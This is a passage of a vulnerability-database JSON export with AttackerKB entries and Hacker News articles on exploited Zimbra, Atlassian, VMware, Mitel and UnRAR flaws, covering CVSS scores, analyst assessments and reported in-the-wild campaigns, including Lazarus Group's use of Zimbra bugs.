"https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:14:34", "description": "Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allow remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at September 20, 2022 9:03pm UTC reported:\n\nVery easy patch to reverse and exploit to develop. Public proofs of concept exist, as well as a Metasploit module. Very important to patch!\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T00:00:00", "type": "attackerkb", "title": "CVE-2022-36804", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-30333", "CVE-2022-36804"], "modified": "2022-09-21T00:00:00", "id": "AKB:A5F9A5B4-EEF8-4409-9D1D-846536B8D033", "href": "https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:15:00", "description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 23, 2022 4:43pm UTC reported:\n\nThis is basically [cve-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>) \u2013 it\u2019s the same exploit, but you don\u2019t send an auth cookie and it fails to prevent access.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-37042", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-11-03T00:00:00", "id": "AKB:042573E7-4FF2-4D52-842B-E72379F0C4D0", "href": "https://attackerkb.com/topics/BLL1VR8x6z/cve-2022-37042", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:39:40", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 24, 2021 3:58am UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**NinjaOperator** at September 21, 2021 6:53pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**architect00** at September 22, 2021 1:31pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). 
Thank you.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22005", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005"], "modified": "2021-09-29T00:00:00", "id": "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "href": "https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T02:14:56", "description": "An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). 
Once pax is installed, amavisd automatically prefers it over cpio.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at October 06, 2022 9:31pm UTC reported:\n\nThis is I think the 6th major issue with Zimbra this year. It\u2019s not really their fault, they use Amavis which uses `cpio` which is vulnerable to CVE-2015-1197, but the attack surface for incoming emails is HUGE.\n\nNot to mention, this is one of several vulnerabilities this year that was being exploited in the wild before being discovered, which means Zimbra is an active target for the Bad Guys.\n\nIf you\u2019re still using Zimbra, you might want to seriously reconsider. I betcha there are others, and they\u2019re probably being exploited.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-41352", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1197", "CVE-2022-30333", "CVE-2022-37393", "CVE-2022-41352"], "modified": "2022-11-10T00:00:00", "id": 
"AKB:82991046-210F-4C54-A578-8E09BD9F6D88", "href": "https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T23:15:56", "description": "The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-29499", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-04-26T00:00:00", "id": "AKB:9CE495DA-1E3B-4486-85DA-2F4FAB15E355", "href": "https://attackerkb.com/topics/M1DmDykURB/cve-2022-29499", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:01:09", "description": "The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user 
account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T00:00:00", "type": "attackerkb", "title": "CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-20T00:00:00", "id": "AKB:8049CCA9-ACA9-4288-8493-4153794BD621", "href": "https://attackerkb.com/topics/BUK2DJ8uhl/cve-2022-26138", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T14:45:10", "description": "RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a 
~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at July 18, 2022 4:55pm UTC reported:\n\nWhile we focused on Zimbra in our analysis, there are almost certainly other targets for this vulnerability that we are not aware of yet.\n\nExploiting this against Zimbra is really bad \u2013 it can be done fairly quietly and it doesn\u2019t require direct access to the server, and can easily lead to root access to the server hosting users\u2019 email. This is super urgent to patch on Zimbra!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-19T00:00:00", "type": "attackerkb", "title": "CVE-2022-30333", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-07-19T00:00:00", "id": "AKB:EFC2EE2A-9172-4B00-94C9-6CC133BD4B05", "href": "https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-05-27T14:39:39", "description": "The vSphere Client 
(HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n\n \n**Recent assessments:** \n \n**ccondon-r7** at February 24, 2021 11:19pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\n**wvu-r7** at February 24, 2021 10:11pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. 
See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "attackerkb", "title": "VMware vSphere Client Unauth Remote Code Execution Vulnerability \u2014 CVE-2021-21972", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-05T00:00:00", "id": "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "href": "https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-08-12T08:05:53", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg9qxbn7rtwp_8HhHdLMCtdFHTS9P9h30LT9JeykqY-hsQi19Y7sKajWFMyeViTZ2691A1RS21KFyOFcoNpHOwRECgwd8gscsC1zGe9BJFv8IWB92a9Xz8hfZhfJqPT6xKB-avmgK7jSEUsQK9qOpai3Bzve7V0tn8fK_PdV5GgLxYz93exTC7im01N/s728-e100/zimbra.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/08/11/cisa-adds-two-known-exploited-vulnerabilities-catalog>) two flaws to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing evidence of active exploitation.\n\nThe two high-severity issues relate to weaknesses in Zimbra Collaboration, both of which could be chained to achieve unauthenticated remote code execution on affected email servers -\n\n * [**CVE-2022-27925**](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>) (CVSS score: 7.2) - Remote code execution (RCE) through mboximport from authenticated user (fixed in [versions](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>) 8.8.15 Patch 31 and 9.0.0 Patch 24 released in March)\n * [**CVE-2022-37042**](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>) \\- Authentication bypass in MailboxImportServlet (fixed in 
[versions](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>) 8.8.15 Patch 33 and 9.0.0 Patch 26 released in August)\n\n\"If you are running a Zimbra version that is older than Zimbra 8.8.15 patch 33 or Zimbra 9.0.0 patch 26 you should update to the latest patch as soon as possible,\" Zimbra [warned](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>) earlier this week.\n\nCISA has not shared any information on the attacks exploiting the flaws but cybersecurity firm Volexity [described](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) mass in-the-wild exploitation of Zimbra instances by an unknown threat actor.\n\nIn a nutshell, the attacks involve taking advantage of the aforementioned authentication bypass flaw to gain remote code execution on the underlying server by uploading arbitrary files.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhV1fby0Cn0K6lGZPpZ_qkx0XEbpXXu9JqeqYyQjSGENl8OIeWZ_NRLD3lLIk4vqar0nZaCUNSeTYYqWVwHfkK1OOzxMrjCUgzpEtGbB6YzEV1U3-C43T9bPbMWrnooZrVJwJ7dTU4DDoVBX32qrIPP9Ay9AGtmUz3HS_uj5mYw9n20cjXOo9Q3lWy/s728-e100/map.jpg>)\n\nVolexity said \"it was possible to bypass authentication when accessing the same endpoint (mboximport) used by CVE-2022-27925,\" and that the flaw \"could be exploited without valid administrative credentials, thus making the vulnerability significantly more critical in severity.\"\n\nIt also singled out over 1,000 instances globally that were backdoored and compromised using this attack vector, some of which belong to government departments and ministries; military branches; and companies with billions of dollars of revenue.\n\nThe attacks, which transpired as recently as the end of June 2022, also involved the deployment of web shells to maintain long-term access to the infected servers. 
Top countries with the most compromised instances include the U.S., Italy, Germany, France, India, Russia, Indonesia, Switzerland, Spain, and Poland.\n\n\"CVE-2022-27925 was originally listed as an RCE exploit requiring authentication,\" Volexity said. \"When combined with a separate bug, however, it became an unauthenticated RCE exploit that made remote exploitation trivial.\"\n\nThe disclosure comes a week after CISA added another Zimbra-related bug, [CVE-2022-27924](<https://thehackernews.com/2022/08/cisa-adds-zimbra-email-vulnerability-to.html>), to the catalog, which, if exploited, could allow attackers to steal cleartext credentials from users of the targeted instances.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-12T06:14:00", "type": "thn", "title": "Researchers Warn of Ongoing Mass Exploitation of Zimbra RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-12T06:14:20", "id": "THN:76E9C775EE4ECFF3F3F1E02BCA0BE2F2", "href": "https://thehackernews.com/2022/08/researchers-warn-of-ongoing-mass.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T08:12:43", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEisdMxSKKuA8oFcW5VApTuLA1_8qiv7WX85vjSnbXrcAc0EYjyxMAq6sl0EFXsgEjtDNIvFeNjVR-BNMd49_sz7_yTIwL4oRVpaYD9mIytX_B4fheBaZrpcevoiSWZrLQy6vtPece3x2HNCMNCqCHmhCmWo1FLFIqKojSzrFhInuEwvu2_dA8KnURVj/s728-e365/ms.jpg>)\n\nA new intelligence gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems.\n\nThat's according to Finnish cybersecurity company WithSecure (formerly F-Secure), which codenamed the incident **No Pineapple** in reference to an error message that's used in one of the backdoors.\n\nTargets of the malicious operation included a healthcare research organization in India, the chemical engineering department of a leading research university, as well as a manufacturer of technology used in the energy, research, defense, and healthcare sectors, suggesting an attempt to breach the supply chain.\n\nRoughly 100GB of data is estimated to have been exported by the hacking crew following the compromise of an unnamed customer, with the digital break-in likely taking place in the third quarter of 2022.\n\n\"The threat actor gained access to the network by exploiting a vulnerable Zimbra mail server at the end of August,\" WithSecure said in a [detailed technical report](<https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector>) shared with The Hacker News.\n\nThe security flaws used for initial access are [CVE-2022-27925 and 
CVE-2022-37042](<https://thehackernews.com/2022/08/researchers-warn-of-ongoing-mass.html>), both of which could be abused to gain remote code execution on the underlying server.\n\nThis step was succeeded by the installation of web shells and the exploitation of local privilege escalation vulnerability in the Zimbra server (i.e., [Pwnkit](<https://thehackernews.com/2022/06/cisa-warns-of-active-exploitation-of.html>) aka CVE-2021-4034), thereby enabling the threat actor to harvest sensitive mailbox data.\n\nSubsequently, in October 2022, the adversary is said to have carried out lateral movement, reconnaissance, and ultimately deployed backdoors such as Dtrack and an updated version of GREASE.\n\n[GREASE](<https://www.cisa.gov/uscert/ncas/alerts/aa20-301a>), which has been attributed as the handiwork of another North Korea-affiliated threat cluster called [Kimsuky](<https://thehackernews.com/2022/07/north-korean-hackers-using-malicious.html>), comes with [capabilities](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>) to create new administrator accounts with remote desktop protocol (RDP) privileges while also skirting firewall rules.\n\nDtrack, on the other hand, has been employed in [cyber assaults](<https://thehackernews.com/2022/11/north-korean-hackers-targeting-europe.html>) aimed at a variety of industry verticals, and also in financially motivated attacks involving the use of [Maui ransomware](<https://thehackernews.com/2022/08/experts-uncover-details-on-maui.html>).\n\n\"At the beginning of November, Cobalt Strike [command-and-control] beacons were detected from an internal server to two threat actor IP addresses,\" researchers Sami Ruohonen and Stephen Robinson pointed out, adding the data exfiltration occurred from November 5, 2022, through November 11, 2022.\n\nAlso used in the intrusion were tools like Plink and 3Proxy to create a proxy on the victim system, echoing [previous 
findings](<https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html>) from Cisco Talos about Lazarus Group's attacks targeting energy providers.\n\nBesides relying solely on an IP address-based infrastructure without any domain names, a crucial link exposing the campaign's links to North Korea stems from a connection originating from an IP address located in the country (175.45.176[.]27) to the patient zero server.\n\n[North Korea-backed hacking groups](<https://www.mandiant.com/resources/blog/mapping-dprk-groups-to-government>) have had a busy 2022, conducting a series of both espionage-driven attacks and [cryptocurrency heists](<https://thehackernews.com/2023/01/fbi-says-north-korean-hackers-behind.html>) that align with the regime's strategic priorities.\n\nMost recently, the BlueNoroff cluster, also known by the names APT38, Copernicium, Stardust Chollima, and TA444, was [connected](<https://thehackernews.com/2023/01/north-korean-hackers-turn-to-credential.html>) to wide-ranging credential harvesting attacks aimed at education, financial, government, and healthcare sectors.\n\n\"North Korea-linked hackers such as those in cybercriminal syndicate Lazarus Group have been by far the most prolific cryptocurrency hackers over the last few years,\" blockchain analytics firm Chainalysis [said](<https://blog.chainalysis.com/reports/2022-biggest-year-ever-for-crypto-hacking/>), calling 2022 the \"biggest year ever for crypto hacking.\"\n\nIn 2022 alone, the threat actors have been accused of being responsible for $1.65 billion worth of cryptocurrency theft, out of which $1.1 billion originated from hacks of DeFi protocols. A total of $3.8 billion was stolen from crypto businesses during the year, up from $3.3 billion in 2021.\n\n \n\n\nFound this article interesting? 
